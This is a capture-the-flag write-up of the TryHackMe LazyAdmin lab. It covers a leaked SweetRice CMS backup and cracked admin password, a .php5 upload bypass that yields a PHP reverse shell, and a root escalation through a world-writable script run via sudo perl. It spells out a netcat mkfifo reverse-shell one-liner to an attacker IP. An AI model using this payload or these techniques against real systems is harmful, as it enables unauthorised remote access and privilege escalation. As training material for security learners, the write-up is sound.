✅TryHackMe - LazyAdmin (Easy)

Summary

Gobuster finds a hidden directory /content that leaks CMS name. Searchsploit finds an exploit that leads us to a MySQL backup file, which leaks admin user's password hash. The password hash is just MD5 and we recover the plaintext password easily. Running Gobuster on /content , we find another hidden directory /content/as that has a login form. Using the leaked credential, we can access the admin panel.

In the admin panel, we find a file upload vulnerability and an easy file extension bypass. Upload php-reverse-shell.php5 and get a reverse shell as www-data.

In the privilege escalation phase, sudo -l finds that we are able to execute Perl as root. There is a backup script that executes /etc/copy.sh as root and /etc/copy.sh is world-writable. Store a Netcat reverse shell payload in it and run sudo perl on the backup script. Then we catch a reverse shell as root.

IP

• RHOST: 10.10.10.20

• LHOST: 10.13.12.2

Nmap

Nmap

Asset Discovery

Gobuster finds a hidden directory /content:

Gobuster

Visit http://lazyadmin.thm/content/. The CMS used is SweetRice:

SweetRice

Admin Panel: Leaked Credential from MySQL Backup

Searchsploit:

searchsploit

The "Backup Disclosure" PoC says that MySQL backup is at /inc/mysql_backup. In our case, it is at /content/inc/mysql_backup. Try to access this directory:

/content/inc/mysql_backup

The manager user's password hash is leaked in this backup:

Password hash

MD5 reverse hash lookup shows that the plaintext password is Password123, so the credential is manager:Password123. Now we need to find a login page to utilize this credential.

Run Gobuster on the directory /content and we find a new directory /content/as:

Gobuster on /content

This directory has a login form:

/content/as

Try the credential we just found and now we have access to the admin panel:

Admin Panel

www-data Shell: File Upload

There is an arbitrary file upload exploit for SweetRice:

Arbitrary file upload

It suggests .php5 bypasses the filter:

.php5

Rename php-reverse-shell.php to php-reverse-shell.php5, go to "Media Center", and upload it:

File upload

Start a pwncat listener and catch a reverse shell as www-data:

www-data shell

Privilege Escalation: Sudo Perl => World-Writable File => Reverse Shell

sudo -l:

sudo -l

The file /home/itguy/backup.pl executes sh /etc/copy.sh as root and /etc/copy.sh is world-writable:

/etc/copy.sh

Store a Netcat reverse shell payload is /etc/copy.sh:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.12.2 1337 >/tmp/f' > /etc/copy.sh

Start a pwncat listener and execute backup.pl as root:

sudo /usr/bin/perl /home/itguy/backup.pl

Now we have a root shell:

root shell